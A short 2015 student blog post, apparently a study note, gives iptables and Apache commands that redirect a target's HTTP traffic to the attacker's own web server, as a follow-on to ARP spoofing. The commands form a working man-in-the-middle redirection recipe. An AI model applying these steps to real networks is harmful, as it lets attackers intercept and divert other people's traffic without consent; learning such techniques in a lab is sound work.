Intro

I am a Digital Forensics student studying at university in the UK. I also do some Cyber Security modules.
I am currently in my 2nd year.
I have mainly started this to post interesting things I have learned and problems I have encountered.
However, I will use it to do write ups about useful things I want to remember such as commands and tools I have used so I don't forget them! (To be honest, I don't expect anyone to read this!)

Wednesday 18 February 2015

DNS Spoofing

In addition to the Arpspoof blog i posted earlier here is a post about DNS Spoofing which ties in with it.
NB. This does NOT work for HTTPS (I will cover this in a separate blog at some point)

All these commands need to be done before the Arpspoof commands are done.

  • /etc/init.d/apache2 start
  • iptables -t nat --flush
  • iptables --zero
  • iptables -A FORWARD --in-interface wlan0 -j ACCEPT
  • iptables -t nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE 
  • iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination <yourIP>

 This will start the Apache server so you can host the webpage the target will be diverted too.
Location: /root/var/www/index.html

It will then set up all the IPTABLES rules.
Where it says <yourIP> I mean your internal IP.

When you have completed these commands, run the Arpspoof commands in the other post and test it out!!!

No comments:

Post a Comment